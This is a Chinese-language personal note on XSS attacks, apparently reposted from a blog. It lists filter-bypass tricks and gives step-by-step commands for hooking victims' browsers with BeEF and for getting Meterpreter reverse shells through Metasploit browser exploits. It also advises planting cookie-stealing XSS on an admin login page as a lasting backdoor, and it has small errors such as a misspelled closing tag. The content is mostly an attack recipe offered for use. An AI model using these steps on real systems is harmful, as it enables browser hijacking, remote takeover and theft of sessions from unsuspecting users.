网络安全-XSS笔记

XSS绕过限制:
1、绕过magic_quotes_gpc
可使用javascript中的String.fromCharCode()
<script>String.fromCharCode()</scrip>
2、HEX编码
十六进制编码
https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
https://www.asciitohex.com/
3、改变大小写
4、关闭标签
5、AWVS 扫描

Kali Linux Beef劫持客户端浏览器:
cd /usr/share/beef-xss 进入目录
ls 查看目录
./beef 运行beef
UI URL:管理 网址浏览器打开 账号密码默认beef
Hook URL: 恶意代码
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser

beef+msf拿客户端shell (ie6 xp)
cd /usr/share/beef-xss 进入目录
./ beef 运行beef
msfconsole 运行msf

msf下执行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 客户端将要访问的IP
set SRVPORT 将要访问的端口
set URIPATH / 网站根目录
set LHOST 客户端回连IP
set LPORT 客户端回连端口
exploit

Using URL 为要让客户端访问的url,beef里设置

session -i 查看得到的shell
session -1 id 查看固定id的shell

shell 拿到权限

beef+msf拿客户端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回连ip
set SRVPORT 回连端口
set URIPATH /
exploit

XSS漏洞扫描工具
WVS
椰树
safe3
Xelenium
w3af
vega
xss扫描插件+burp

长期留后门,可将XSS获取cookie代码留在管理登录页面

Xss平台搭建
使用工具:
wamp2.2+xss.me源码

猜你喜欢

转载自blog.51cto.com/3945465/2140843